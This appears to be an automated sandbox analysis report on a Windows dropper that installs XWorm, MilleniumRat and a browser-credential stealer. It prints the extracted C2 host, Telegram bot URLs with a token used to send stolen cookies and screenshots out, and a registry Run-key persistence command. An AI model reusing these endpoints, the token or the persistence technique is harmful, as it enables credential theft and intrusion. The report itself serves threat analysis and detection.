Analysis
max time kernel: 114s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-09-2024 11:30

Static task: static1

Behavioral task: behavioral1
Sample: Output.exe
Resource: win7-20240903-en

Behavioral task: behavioral2
Sample: Output.exe
Resource: win10v2004-20240802-en
General
Target: Output.exe
Size: 11.6MB
MD5: d7c99b9559332b8652b2cf85c34f1dea
SHA1: cbd247890c862d964683f8dc81cc3d7747bdfb73
SHA256: 53d398e45aaad1c1cbbb4be5abd2a0d2c039b746792fb63bd8b9b28aebf359ca
SHA512: 184945ec88ebe3e3ec5e3a71b9870b3459a0bb37491a665f356d3cb7286e0e79bed44a19e21cceba0fe0ec07a1d89e2238c70b06bd9c5dc5956b7715e8a8911f
SSDEEP: 196608:tO3ytpGu2gWR5fMEseOI8LG8Ac+g6sFZstcVw8q1Q6HmVF:tO3j5gWR5fBSI58t+gbZst9
Malware Config
Extracted: xworm
  reason-warnings.gl.at.ply.gg:20382
  Install_directory: %AppData%
  install_file: USB.exe
Extracted: gurcu
  https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4594364141&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb
  https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendMessage?chat_id=-4594364141
  https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/getUpdates?offset=-
  https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4590251468&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20138.199.29.44%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
  https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4594364141&caption=%F0%9F%93%B8Screenshot%20take
Signatures

Detect Xworm Payload (2 IoCs)
  resource                                                                     yara_rule
  behavioral2/files/0x000700000002347e-17.dat                                  family_xworm
  behavioral2/memory/4384-25-0x0000000000820000-0x0000000000852000-memory.dmp  family_xworm

MilleniumRat
MilleniumRat is a remote access trojan written in C#.

Checks computer location settings (2 TTPs, 4 IoCs)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                              Process
  Key value queried  \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation  Output.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation  qscan_original.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation  built.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation  DotStealerBuild.exe

Executes dropped EXE (4 IoCs)
  pid   Process
  3080  qscan_original.exe
  4384  system user.exe
  3152  built.exe
  452   DotStealerBuild.exe

Loads dropped DLL (2 IoCs)
  pid   Process
  3152  built.exe
  452   DotStealerBuild.exe

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 1 IoCs)
  description      ioc                                                                                                                                                           Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\built.exe"  reg.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  flow  ioc
  8     raw.githubusercontent.com
  10    raw.githubusercontent.com
  14    raw.githubusercontent.com

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  7     ip-api.com

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 4 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                       Process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  built.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0             DotStealerBuild.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  DotStealerBuild.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0             built.exe

Modifies registry key (1 TTPs, 1 IoCs)
  pid   Process
  2008  reg.exe

Suspicious behavior: EnumeratesProcesses (53 IoCs)
  pid   Process (53 events from two distinct processes)
  452   DotStealerBuild.exe
  3152  built.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description               pid   Process
  Token: SeDebugPrivilege   4384  system user.exe
  Token: SeDebugPrivilege   3152  built.exe
  Token: SeDebugPrivilege   452   DotStealerBuild.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
  pid   Process
  3152  built.exe

Suspicious use of WriteProcessMemory (14 IoCs)
  description                        pid   Process              procid_target
  PID 4496 wrote to memory of 3080   4496  Output.exe           82
  PID 4496 wrote to memory of 3080   4496  Output.exe           82
  PID 4496 wrote to memory of 4384   4496  Output.exe           83
  PID 4496 wrote to memory of 4384   4496  Output.exe           83
  PID 3080 wrote to memory of 3152   3080  qscan_original.exe   84
  PID 3080 wrote to memory of 3152   3080  qscan_original.exe   84
  PID 3080 wrote to memory of 452    3080  qscan_original.exe   85
  PID 3080 wrote to memory of 452    3080  qscan_original.exe   85
  PID 3152 wrote to memory of 4600   3152  built.exe            90
  PID 3152 wrote to memory of 4600   3152  built.exe            90
  PID 4600 wrote to memory of 2008   4600  cmd.exe              92
  PID 4600 wrote to memory of 2008   4600  cmd.exe              92
  PID 452 wrote to memory of 2680    452   DotStealerBuild.exe  95
  PID 452 wrote to memory of 2680    452   DotStealerBuild.exe  95
Processes

C:\Users\Admin\AppData\Local\Temp\Output.exe (PID 4496)
  command line: "C:\Users\Admin\AppData\Local\Temp\Output.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Roaming\qscan_original.exe (PID 3080)
    command line: "C:\Users\Admin\AppData\Roaming\qscan_original.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Roaming\built.exe (PID 3152)
      command line: "C:\Users\Admin\AppData\Roaming\built.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Loads dropped DLL
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\cmd.exe (PID 4600)
        command line: "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\built.exe /f
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\reg.exe (PID 2008)
          command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\built.exe /f
          - Adds Run key to start application
          - Modifies registry key

    C:\Users\Admin\AppData\Roaming\DotStealerBuild.exe (PID 452)
      command line: "C:\Users\Admin\AppData\Roaming\DotStealerBuild.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Loads dropped DLL
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\cmd.exe (PID 2680)
        command line: "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA76B.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpA76B.tmp.bat

  C:\Users\Admin\AppData\Roaming\system user.exe (PID 4384)
    command line: "C:\Users\Admin\AppData\Roaming\system user.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
Network

MITRE ATT&CK Enterprise v15
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)
Downloads